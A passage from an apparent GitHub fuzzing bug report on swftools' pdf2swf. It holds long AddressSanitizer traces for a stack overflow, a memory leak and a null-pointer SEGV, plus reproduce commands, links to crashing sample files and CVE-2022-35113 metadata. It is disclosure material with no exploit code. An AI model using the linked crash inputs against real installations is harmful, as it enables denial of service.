/home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #142 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #143 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #144 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #145 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #146 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #147 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #148 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #149 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #150 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #151 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #152 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #153 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #154 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #155 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #156 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #157 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #158 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #159 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #160 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #161 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #162 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #163 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #164 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #165 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #166 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #167 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #168 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #169 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #170 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #171 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #172 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #173 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #174 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #175 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #176 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #177 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #178 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #179 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #180 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #181 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #182 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #183 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #184 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #185 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #186 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #187 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #188 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #189 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #190 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #191 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #192 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #193 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #194 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #195 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #196 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #197 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #198 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #199 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #200 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #201 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #202 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #203 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #204 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #205 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #206 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #207 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #208 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #209 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #210 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #211 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #212 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #213 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #214 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #215 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #216 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #217 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #218 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #219 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #220 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #221 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #222 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #223 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #224 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #225 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #226 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #227 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #228 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #229 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #230 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #231 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #232 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #233 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #234 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #235 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #236 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #237 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #238 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #239 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #240 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #241 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #242 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #243 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #244 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #245 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #246 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #247 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #248 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #249 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #250 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #251 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #252 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #253 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #254 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #255 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #256 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #257 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #258 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #259 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #260 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #261 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #262 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #263 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #264 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #265 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #266 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #267 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #268 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #269 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #270 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #271 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #272 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #273 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #274 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #275 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #276 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #277 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #278 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #279 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #280 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #281 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #282 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #283 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #284 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 SUMMARY: AddressSanitizer: stack-overflow /build/glibc-CVJwZb/glibc-2.27/stdio-common/vfprintf.c:1275 in vfprintf ==27980==ABORTING ``` ### reproduce command to reproduce: ./pdf2swf -G -f -t [sample file] -o /dev/null ### sample file [id479_stack_overflow___asanAllocatorAllocate.zip](https://github.com/matthiaskramm/swftools/files/9036150/id479_stack_overflow___asanAllocatorAllocate.zip) ### crash info ``` ==29770==ERROR: AddressSanitizer: stack-overflow on address 0x7ffccd202fe8 (pc 0x0000004e43a9 bp 0x7fb33d9f7000 sp 0x7ffccd202fc0 T0) #0 0x4e43a9 in __sanitizer::StackDepotNode::hash(__sanitizer::StackTrace const&) /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/sanitizer_common/sanitizer_stackdepot.cpp:54 #1 0x4e43a9 in __sanitizer::StackDepotBase<__sanitizer::StackDepotNode, 1, 20>::Put(__sanitizer::StackTrace, bool*) /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/sanitizer_common/sanitizer_stackdepotbase.h:104 #2 0x4e43a9 in __sanitizer::StackDepotPut(__sanitizer::StackTrace) /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/sanitizer_common/sanitizer_stackdepot.cpp:98 #3 0x42b232 in __asan::Allocator::QuarantineChunk(__asan::AsanChunk*, void*, __sanitizer::BufferedStackTrace*) /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_allocator.cpp:640 #4 0x42b232 in __asan::Allocator::Deallocate(void*, unsigned long, unsigned long, __sanitizer::BufferedStackTrace*, __asan::AllocType) /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_allocator.cpp:714 #5 0x42b232 in __asan::asan_free(void*, __sanitizer::BufferedStackTrace*, __asan::AllocType) /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_allocator.cpp:971 #6 0x4b2e60 in free /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:128 #7 0x607d1b in gfree /home/bupt/Desktop/swftools/lib/pdf/xpdf/gmem.cc:275:5 #8 0x65039b in Object::free() /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc #9 0x65bbdc in Parser::shift() /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:221:8 #10 0x65bbdc in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:61:5 #11 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 //........ #254 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 SUMMARY: AddressSanitizer: stack-overflow /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/sanitizer_common/sanitizer_stackdepot.cpp:54 in __sanitizer::StackDepotNode::hash(__sanitizer::StackTrace const&) ==29770==ABORTING ``` --------------------------- # memory leak ### reproduce command to reproduce: ./pdf2swf -G -f -t [sample file] -o /dev/null ### sample file [id472_memory_leak.zip](https://github.com/matthiaskramm/swftools/files/9036159/id472_memory_leak.zip) ### crash info ``` =28310==ERROR: LeakSanitizer: detected memory leaks Indirect leak of 96 byte(s) in 2 object(s) allocated from: #0 0x4b3160 in malloc /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x96870e in rfx_alloc /home/bupt/Desktop/swftools/lib/mem.c:30:9 #2 0x7efc80cddc86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 SUMMARY: AddressSanitizer: 96 byte(s) leaked in 2 allocation(s). ``` ------------------------ # SEGV ### reproduce command to reproduce: ./pdf2swf -G -f -t [sample file] -o /dev/null ### sample file [id382_SEGV_getchar.zip](https://github.com/matthiaskramm/swftools/files/9036166/id382_SEGV_getchar.zip) ### crash info ``` ==3792==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000000632fbf bp 0x000000000000 sp 0x7fffb1af4390 T0) ==3792==The signal is caused by a READ memory access. ==3792==Hint: address points to the zero page. #0 0x632fbf in DCTStream::getChar() /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:2048:9 #1 0x60e023 in ImageStream::getLine() /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:373:25 #2 0x60dd51 in ImageStream::getPixel(unsigned char*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:344:5 #3 0x7c9dc5 in VectorGraphicOutputDev::drawGeneralImage(GfxState*, Object*, Stream*, int, int, GfxImageColorMap*, int, int, int, int*, Stream*, int, int, int, GfxImageColorMap*) /home/bupt/Desktop/swftools/lib/pdf/VectorGraphicOutputDev.cc:1303:12 #4 0x7ccc45 in VectorGraphicOutputDev::drawImage(GfxState*, Object*, Stream*, int, int, GfxImageColorMap*, int*, int) /home/bupt/Desktop/swftools/lib/pdf/VectorGraphicOutputDev.cc:1430:5 #5 0x71dc57 in Gfx::doImage(Object*, Stream*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:3664:12 #6 0x6ec5e0 in Gfx::opXObject(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:3336:7 #7 0x705f02 in Gfx::execOp(Object*, Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:693:3 #8 0x7049c1 in Gfx::go(int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:584:7 #9 0x703ea8 in Gfx::display(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:556:3 #10 0x6b9401 in Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:317:10 #11 0x6b8cee in Page::display(OutputDev*, double, double, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:264:3 #12 0x6099b0 in PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/PDFDoc.cc:317:27 #13 0x5f87d5 in render2(_gfxpage*, _gfxdevice*, int, int, int, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/pdf.cc:164:14 #14 0x5f8e64 in pdfpage_rendersection(_gfxpage*, _gfxdevice*, double, double, double, double, double, double) /home/bupt/Desktop/swftools/lib/pdf/pdf.cc:190:5 #15 0x501816 in main /home/bupt/Desktop/swftools/src/pdf2swf.c:832:3 #16 0x7f66704d8c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #17 0x420b99 in _start (/home/bupt/Desktop/swftools/build/bin/pdf2swf+0x420b99) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:2048:9 in DCTStream::getChar() ==3792==ABORTING ```
bug report swftools-pdf2swf
https://api.github.com/repos/swftools/swftools/issues/184/comments
0
2022-07-04T03:13:51Z
2022-07-04T03:20:37Z
https://github.com/swftools/swftools/issues/184
1,292,557,716
184
CVE-2022-35113
2022-08-16T21:15:11.363
SWFTools commit 772e55a2 was discovered to contain a heap-buffer overflow via swf_DefineLosslessBitsTagToImage at /modules/swfbits.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/185" } ]
